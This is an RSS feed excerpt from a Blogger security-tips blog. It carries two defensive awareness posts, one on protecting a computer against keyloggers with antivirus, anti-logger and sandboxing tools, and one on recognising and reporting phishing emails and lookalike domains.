&lt;span style="background-color: white;"&gt;&lt;span style="font-size: 14px;"&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;K&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: 14px;"&gt;eyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So, it is often used by hackers&amp;nbsp;to steal passwords, credit card numbers and other confidential data from your computer. Below are some methods through which you can protect your computer from key loggers:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
1. Use a Good Antivirus&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;This is the first and the basic step that you need to take in order to protect your computer from key loggers and other online threats. Use a good antivirus such as Kaspersky, Norton&amp;nbsp;or McAfee&amp;nbsp;and update it regularly.&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
2. Use a Good Anti spyware&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;If you are a frequent Internet user, then you could be exposed to a number of spywares on a regular basis.&amp;nbsp;Since key logger&amp;nbsp;is basically a&amp;nbsp;spyware, it is better to install a good antispyware program. Make sure that the antivirus and the anti spyware&amp;nbsp;you use do not conflict with each other.&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
3. Anti logger can be Handy&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Anti loggers are the programs that detect the presence of key loggers on a given computer. Over the past few years, I have tested a lot of anti-logging programs and have found&amp;nbsp;&lt;a href="http://www.zemana.com/" rel="nofollow" target="_blank"&gt;Zemana Antilogger&lt;/a&gt;&amp;nbsp;as the best one.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Normally, a key logger can easily be detected by a good antivirus program, but hackers may use some methods such as hexing, binding or&amp;nbsp;encrypting&amp;nbsp;to make it harder for the antivirus program to detect it. In this case,&amp;nbsp;Zemana Antilogger comes handy as this program is specially designed to protect your PC against harmful key loggers.&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;img alt="Zemana Antilogger" height="221" src="https://www.gohacking.com/wp-content/uploads/2010/10/Zemana-Antilogger.jpeg" width="228" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
4. Online Scanning&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;When ever you receive a suspicious file,&amp;nbsp;you scan it with online scanners such as&amp;nbsp;&lt;a href="http://vscan.novirusthanks.org/" rel="nofollow" target="_blank"&gt;Multi engine antivirus scanner&lt;/a&gt;&amp;nbsp;which scans your file with 24 popular antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines involved in the scanning process.&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
5. Use Sandboxie&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;&lt;a href="http://www.sandboxie.com/" rel="nofollow" target="_blank"&gt;Sandboxie&lt;/a&gt;&amp;nbsp;is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;When ever you receive a file&amp;nbsp;that looks suspicious, just run the program with Sandboxie so that,&amp;nbsp;you can test it without the risk of making permanent changes to your computer.&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;img alt="Sandboxie" class="aligncenter size-full wp-image-3687" height="212" src="https://www.gohacking.com/wp-content/uploads/2010/10/Sandboxie1.png" width="544" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;To run a program in Sandboxie, follow the steps as&amp;nbsp;mentioned below:&lt;/span&gt;&lt;/div&gt;
&lt;ol style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px;"&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Open the Sandboxie tool and&amp;nbsp;click on&amp;nbsp;sandbox&amp;nbsp;menu&amp;nbsp;on the top.&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Now go to&amp;nbsp;Default sandbox.&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Then click on&amp;nbsp;run any program.&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Now select the file you wish to run in sandboxie and click open.&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style="line-height: 23.796875px;"&gt;
&lt;span style="background-color: white; font-weight: normal;"&gt;
6. Key scrambler&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;&lt;a href="http://www.qfxsoftware.com/" rel="nofollow" target="_blank"&gt;Keyscrambler&lt;/a&gt;&amp;nbsp;is one of the best program that offers protection against keyloggers.&amp;nbsp;It is a small program which encrypts your keystrokes so that, even if your computer has a keylogger installed on it, only the encrypted keystrokes are captured by the keylogger and not the actual ones.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;The free version of Keyscrambler currently supports Firefox, IE and a few other applications. However it’s premium version supports more than 160 applications.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;span style="background-color: white;"&gt;Hope you liked my post! Pass the comments.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; text-align: justify;"&gt;
&lt;/div&gt;
&lt;div class="alertBox-info" style="font-family: Arial, Verdana, sans-serif; z-index: 970;"&gt;
&lt;div style="margin-bottom: 0pt; z-index: 969;"&gt;
&lt;span style="background-color: white;"&gt;This is a guest post by Rafay&amp;nbsp;Baloch who is an 18 year computer engineering student who blogs at:&amp;nbsp;&lt;a href="http://www.rafayhackingarticles.net/" target="_blank"&gt;Rafay Hacking Articles&lt;/a&gt;. He is also the writer of the book: “&lt;a href="http://www.hacking-book.com/" target="_blank"&gt;A Beginners Guide To Ethical Hacking&lt;/a&gt;“.&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0pt; z-index: 969;"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0pt; text-align: center; z-index: 969;"&gt;
&lt;span style="background-color: white;"&gt;Follow these instructions and get maximum security also share this to your friends to whom you want to be safe...&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UzCK0qsU-SQFxHYltnk0fj7yzaVv7uup8CgX21Sw3QK3BQaJsllYf3kVT0keW7gA43Cn0N_Gutk7OKOexrQ6l-CGFYA2n41wB9uvDasFgoMN-SISSC8IuL1J_T5gdjYzZF1YbJ26D_E/s72-c/Ways-To-Protect-Yourself-Against-Keyloggers.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Identify and Avoid Phishing Scams</title><link>https://snacksofhacks.blogspot.com/2013/01/how-to-identify-and-avoid-phishing-scams.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 16:50:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1439801694912137296</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKY2FDgpU_cmiHk14EspYN175VrxRgy476JuOneWfaju7V65QEc0zTH02BUN4eVzjXpiZDynkLlL8myUmTgWYREupboDE3FCWDPcf7Ev_FKoiOb1x5xpEkvZzhJNPXTB-plzIrzHetdjs/s1600/phishing-hook-on-computer.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="546" data-original-width="970" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKY2FDgpU_cmiHk14EspYN175VrxRgy476JuOneWfaju7V65QEc0zTH02BUN4eVzjXpiZDynkLlL8myUmTgWYREupboDE3FCWDPcf7Ev_FKoiOb1x5xpEkvZzhJNPXTB-plzIrzHetdjs/s400/phishing-hook-on-computer.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: arial, verdana, sans-serif; font-size: large; line-height: 1.7em; text-align: justify;"&gt;&lt;b&gt;P&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: arial, verdana, sans-serif; line-height: 1.7em; text-align: justify;"&gt;hishing is a form of social engineering technique used by hackers to gather sensitive information such as usernames, passwords and credit card details by posing as a&amp;nbsp;trustworthy&amp;nbsp;person or organization.&amp;nbsp;Since most&amp;nbsp;online users are unaware of the techniques used in carrying out a phishing attack, they often fall victim and hence,&amp;nbsp;phishing can be very effective.&lt;/span&gt;&lt;br /&gt;
&lt;div class="entry" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; line-height: 1.7em; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 971;"&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
With the dramatic increase in the number of phishing scams in the recent years, there has also been a steady&amp;nbsp;rise in the number of people&amp;nbsp;being victimized. Lack of awareness among the people is the prime reason behind such attacks. This article will try to create awareness and educate the users about such online scams and frauds.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Phishing&amp;nbsp;scams usually sends an email message to users requesting&amp;nbsp;for their personal information, or redirects them to a website where they are required to enter thier personal information.&amp;nbsp;Here&amp;nbsp;are some of the&amp;nbsp;tips to identify various&amp;nbsp;phishing&amp;nbsp;techniques and stay away from it:&lt;/div&gt;
&lt;h2 style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; font-family: &amp;quot;open sans&amp;quot;, arial, sans-serif; margin: 0px 0px 0.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-size: small;"&gt;
Identifying a Phishing Scam:&lt;/span&gt;&lt;/h2&gt;
&lt;ol style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Beware of emails that demand for an urgent response from your side. Some of the examples are:&lt;/div&gt;
&lt;ul style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc outside none; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
You may receive an email which appears to have come from your bank or financial organization stating that “your bank account is limited due to an unauthorized activity. Please&amp;nbsp;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"&gt;&lt;em style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;verify your account&lt;/em&gt;&lt;/span&gt;asap so as to avoid&amp;nbsp;permanent&amp;nbsp;suspension”. In most cases, you are requested to follow a link (URL) that takes you to&amp;nbsp;spoofed web page (similar to your bank website)&amp;nbsp;and enter your login details over there.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
In some cases, phishing emails may ask you to make a phone call. There may be a person or an audio response waiting on the other side of the phone to take away your credit cards details, account number, social security number or other valuable data.&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Phishing emails are generally not personalized. Since they target a lagre number of online&amp;nbsp;users, they usually use generalized&amp;nbsp;texts like “Dear valued customer”, “Dear Paypal user” etc. to address you. However, some phishing emails can be an exception to this rule.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
When you click on the links contained in a phishing email, you will most likely be taken to a spoofed web page with official logos and information that looks exactly same as that of the original&amp;nbsp;web pages&amp;nbsp;of your bank or financial organization.&amp;nbsp;Pay attention to the URL of a website before you enter any of your personal information over there.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Even though malicious websites look identical to the legitimate&amp;nbsp;site, it often uses a different&amp;nbsp;domain or variation in the spelling. For example, instead of&amp;nbsp;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;paypal.com&lt;/strong&gt;&lt;/span&gt;, a phishing website may use different addresses such as:&lt;/div&gt;
&lt;ul style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc outside none; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;papyal.com&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;paypal.org&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;verify-paypal.com&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; list-style: disc inside none; margin: 0px; outline: 0px; padding: 3px 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;xyz.com/paypal/verify-account/&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; font-family: &amp;quot;open sans&amp;quot;, arial, sans-serif; margin: 0px 0px 0.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-size: small;"&gt;
Tips to Avoid Being a Victim of Phishing:&lt;/span&gt;&lt;/h2&gt;
&lt;ol style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Do not respond to suspicious emails that ask you to give your personal information. If you are unsure whether an email request is legitimate, verify the same by calling the respective bank/company. Always use the telephone numbers printed on your bank records or statements and not those mentioned in the suspicious email.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Don’t use the links in an email, instant messenger or chat conversation to enter a website. Instead, always type the URL of the website on your browser’s address bar to&amp;nbsp;get into&amp;nbsp;a website.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Legitimate websites always use a secure connection (&lt;em style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;https://&lt;/em&gt;) on those pages which are intended to gather sensitive data such as passwords, account numbers or credit card details. You will see a lock icon&amp;nbsp;&lt;img alt="Picture of the Lock icon" src="https://windowshelp.microsoft.com/BetterWhenConnectedHelpWS/GetContent.aspx?assetID=270b1b5c-1151-4886-9994-901c2e4568b3&amp;amp;documentSet=en-US&amp;amp;renderKey=SIGNED1" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;in your browser’s address bar which indicates a secure connection. On some websites like paypal.com which uses&amp;nbsp;an extended validation certificate, the&amp;nbsp;address bar turns&amp;nbsp;&lt;span style="background-attachment: scroll; background-color: green; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;strong style="background-attachment: scroll; background-color: transparent; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;GREEN&lt;/strong&gt;&lt;/span&gt;&amp;nbsp;as shown below.&lt;/div&gt;
&lt;div align="center" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="HTTPS Address Bar" class="aligncenter size-full wp-image-4396" src="https://www.gohacking.com/wp-content/uploads/2011/05/HTTPS_Address-Bar.jpg" height="35" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; clear: both; display: block; margin: 0px auto; outline: 0px; padding: 0px; vertical-align: baseline;" title="HTTPS Address Bar" width="269"&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
In most cases,&amp;nbsp;unlike a legitimate website, a phishing website or a spoofed web page will not use a secure connection and does not show up the lock icon. So, absence of such security features&amp;nbsp;can be a clear indication of phishing attack.&amp;nbsp;Always double-check the security features of the web page before entering any of your personal information.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Always use a good antivirus software, firewall and email filters to filter the unwanted traffic. Also ensure that your browser is up-to-date with the necessary patches&amp;nbsp;being applied.&lt;/div&gt;
&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Report a “phishing attack” or “spoofed emails” to the following groups so as to stop such attacks from spreading all over the Internet:&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
You can directly send an email to&amp;nbsp;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;reportphishing@antiphishing.org&lt;/strong&gt;&amp;nbsp;or&amp;nbsp;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;spam@uce.gov&lt;/strong&gt;&amp;nbsp;reporting an attack. You can also notify the Internet Crime Complaint Center of the FBI by filing a complaint on their website:&amp;nbsp;&lt;a href="http://www.ic3.gov/" rel="nofollow" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: all 0.2s; vertical-align: baseline;" target="_blank"&gt;www.ic3.gov&lt;/a&gt;.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
I hope the information presented in this article will help you detect and avoid various phishing scams that are waiting to rip off innocent Internet users. If you’ve anything to say, please pass your comments.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKY2FDgpU_cmiHk14EspYN175VrxRgy476JuOneWfaju7V65QEc0zTH02BUN4eVzjXpiZDynkLlL8myUmTgWYREupboDE3FCWDPcf7Ev_FKoiOb1x5xpEkvZzhJNPXTB-plzIrzHetdjs/s72-c/phishing-hook-on-computer.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>